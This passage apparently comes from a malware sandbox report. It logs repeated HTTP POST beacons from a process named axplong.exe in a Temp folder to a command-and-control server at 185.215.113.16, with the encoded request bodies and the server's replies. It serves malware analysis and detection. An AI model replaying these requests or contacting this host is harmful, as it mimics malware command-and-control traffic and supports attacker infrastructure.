Sep 26, 2024 15:42:09.587032080 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:09.810935020 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	52325	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:09.925278902 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:10.620050907 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:10.620804071 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:10.918925047 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	52327	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:11.034682989 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:11.746453047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:11.749627113 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:11.977494955 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	52328	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:12.096718073 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:12.825663090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:12.826402903 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:13.132277012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	52329	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:13.253243923 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:13.999247074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:14.000117064 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:14.223839045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	52330	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:14.331346989 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:15.051147938 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:15.051896095 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:15.282052994 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	52331	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:15.411087990 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:16.301153898 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:16.301928997 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:16.588774920 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	52332	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:16.706948996 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:17.627240896 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:17.627991915 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:17.858223915 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	52333	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:17.978853941 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:18.756419897 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:18.757503986 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:18.986959934 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	52334	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:19.096788883 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:19.846638918 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:19.847347021 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:20.087435961 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	52335	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:20.208187103 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:20.926371098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:20.927572966 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:21.175602913 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	52336	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:21.284813881 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:22.017019033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:22.017832994 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:22.249780893 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	52337	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:22.362879038 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:23.112827063 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:23.113713026 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
